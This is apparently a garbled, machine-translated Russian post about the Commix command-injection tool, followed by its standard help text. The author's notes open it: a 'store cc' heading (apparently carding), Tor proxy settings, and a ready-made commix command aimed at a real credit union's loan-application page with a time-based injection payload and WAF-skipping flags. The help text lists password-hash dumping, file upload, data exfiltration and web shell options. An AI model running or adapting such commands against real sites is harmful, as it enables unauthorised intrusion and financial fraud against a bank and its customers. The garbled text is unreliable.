Commix(comm]and [i]njection e[x]ploiter)” store cc

git clone https://github.com/stasinopoulos/commix.git commix

============= tor proxy=127.0.0.1:9050 but from one servak the fuck so two comics hapustaeshuyu need to think cunning how something

level=3 ignore-401 skip-waf tamper=

example ./commix.py -u https://www.communityfirst-yncu.com/Personal/ProductsAndServices/Borrowing/PersonalLoans/Apply/ data=LoginTag.ShowForm=form;start-sleep -s 5 #submit=Login to Online Banking level=3 ignore-401 skip-waf ============ Description Commix Commix (which is short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers and even security researchers to test web applications for bugs, errors or vulnerabilities related to command injection attacks. Using this tool, it is very easy to find and exploit command injection vulnerabilities in a particular vulnerable parameter or string. Commix is written in the Python programming language.

Exploiting DVWA (1.0.8) command injection flaws. Exploiting bWAPP command injection flaws (normal blind). Exploiting Persistence blind command injection flaw. Exploiting shellshock command injection flaws. Upload a PHP shell (i.e. Metasploit PHP Meterpreter) on target host. Upload a Weevely PHP web shell on target host. Exploiting cookie-based command injection flaws. Exploiting user-agent-based command injection flaws. Exploiting referer-based command injection flaws. Rack cookies and commands injection.

Homepage: https://github.com/stasinopoulos/commix Author: Anastasios Stasinopoulos License: GPLv3 Commix help

Usage: python commix.py[options]

Options: -h, help Show help and exit.

General: These parameters are common in different uses.

verbose Enable verbal mode. version Show version number and exit. output-dir=OUT… Set user-defined output directory path. -s SESSION_FILE Load a session from a saved (.sqlite) file. flush-session Clear session files for current target. ignore-session Ignore results saved in session file.

Target: These options are involved in defining the target URL.

-u URL, url=URL Target URL. url-reload Reload the target URL after running the command. -l LOGFILE Parse target and data from HTTP proxy log file.

Query: These options can be used to determine how to connect to the target URL.

data=DATA Data string to send via POST. host=HOST HTTP Host header. referer=REFERER HTTP Referer header. user-agent=AGENT HTTP User-Agent header. random-agent Use a randomly selected HTTP User-Agent header. param-del=PDEL Set character to separate parameter values. cookie=COOKIE HTTP Cookie header. cookie-del=CDEL Set character to split cookie values. headers=HEADERS Additional headers (for example, Header1:Value1nHeader2:Value2). proxy=PROXY Use HTTP proxy (for example 127.0.0.1:8080). tor Use the Tor network. tor-port=TOR_P. Set a Tor proxy port (default: 8118). auth-url=AUTH_. Login panel URL. auth-data=AUTH. Login parameters and data. auth-type=AUTH. HTTP authentication type (basic for example). auth-cred=AUTH. HTTP authentication credentials (for example admin:admin). ignore-401 Ignore HTTP error 401 (Unauthorized). force-ssl Force SSL/HTTPS.

Listing: These options can be used to list the properties of the target host.

all Get all. current-user Get the current user name. hostname Get the current hostname. is-root Check if the current user has root privileges. is-admin Check if the current user has root privileges. sys-info Get system information. users Get system users. passwords Get password hashes for system users. privileges Get system user privileges. ps-version Get PowerShell version number.

File Access: These options can be used to access files on the target host.

file-read=FILE… Read the file from the target host. file-write=FIL… Write the file to the target host. file-upload=FI… Upload the file to the target host. file-dest=FILE… Absolute path on the host to write and/or upload.

Modules: These options can be used to increase detection and/or injection capabilities.

icmp-exfil=IP_. The icmp exfiltration injection technique (for example ip_src=192.168.178.1,ip_dst=192.168.178.3). dns-server=DNS. DNS exfiltration injection module. (Domain name used for the DNS exfiltration attack). shellshock shellshock injection technique.

Injection: These options can be used to specify which parameters to insert for injection and pass custom injection requests.

-p TEST_PARAMETER Parameter(s) to be tested. suffix=SUFFIX Suffix query string for injection. prefix=PREFIX Prefix query string for injection. technique=TECH Specify the technique(s) to inject. maxlen=MAXLEN Set the maximum output length for time-based injection technique (Default: 10000 characters). delay=DELAY Set the delay time for the time-based injection technique (Default: 1 second). tmp-path=TMP_P. Set the absolute path of the web server’s temporary directory. root-dir=SRV_R.. Set the absolute path of the web server root directory. alter-shell=AL… Use an alternate OS shell (for example, Python). os-cmd=OS_CMD Execute a separate operating system command. os=OS Force back-end operating system to this value. tamper=TAMPER Use this script(s) to inject data.

Detection: These options can be used to set the detection phase.

level=LEVEL Level of testing to be performed (1-3, Default: 1).

Miscellaneous: dependencies Check for third-party (not key) dependencies. skip-waf Skip eurestic detection of WAF/IPS/IDS protection.

Examples of running Commix Test user passed pingme page parameter https://localhost/pingme/ (-u https://localhost/pingme/?pingme=hackware.ru): 1 sudo commix -u https://localhost/pingme/?pingme=hackware.ru Test user passed POST parameter name (data=name=-s) https://localhost/dvws/vulnerabilities/cmdi/client.php (-u https://localhost/dvws/vulnerabilities/cmdi/client.php): 1 sudo commix -u https://localhost/dvws/vulnerabilities/cmdi/client.php data=name=-s You can see examples on different vulnerable environments at: https://github.com/stasinopoul Installation in BlackArch The program is preinstalled in BlackArch. ==============================

store cc

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *